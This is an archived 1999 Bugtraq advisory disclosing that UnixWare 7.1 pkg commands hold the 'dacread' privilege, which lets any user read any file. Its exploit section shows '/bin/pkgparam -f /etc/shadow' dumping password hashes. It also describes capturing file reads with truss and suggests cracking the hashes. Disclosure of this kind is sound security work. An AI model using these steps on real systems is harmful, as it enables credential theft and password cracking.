Home page logo
/

bugtraq logo Bugtraq mailing list archives

UnixWare and the dacread permission
From: btellier () USA NET (Brock Tellier)
Date: Fri, 3 Dec 1999 21:21:17 MST


Greetings,

OVERVIEW
Any user may read any file on the system.

BACKGROUND
Only UnixWare 7.1 has been tested.

DETAILS
As previously stated, UnixWare binaries gain additional privileges via
standard suid/sgid AND /etc/security/tcb/privs.  The majority of the UnixWare
"pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to a bug
which will allow any user to read any file on the system as a result of their
additional "dacread" permission in the privs file.

The dacread permission allows a process to override the Discretionary Access
Controls (DAC) for read-only operations.  Basically, a process with the
dacread permissions is able to bypass the mode bits and ownership on a file,
but only for reading it.  A process with dacwrite permissions can bypass mode
bits to write to or execute that file.

I'm pretty sure that the bugs I found in the pkg commands were introduced by
their addition to the privs file.  As far as I can tell, there is virtually no
reason for them to be able to read any file on the system.  

All around, this additional privilege thing, well, sucks.  Consider now that
the truss(1) command will allow the user to see any file i/o that happens
between a process and the system since it isn't suid/sgid.  Thus, if there is
*any* way that you can make pkg* read from a file, even if the output is never
printed, you can examine truss output to get the file's contents.

EXPLOIT
The worst offender of pkg* is pkgparam, which will print the contents of a
file to stdout, though I've been able to get most of the pkg program to read
from /etc/shadow in one way or another and grab the contents with truss.

bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x    1 root     sys          166784 May 21  1999
/bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$ 
Now just concatenate the first field of /etc/passwd with this file and run
your favorite cracker.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]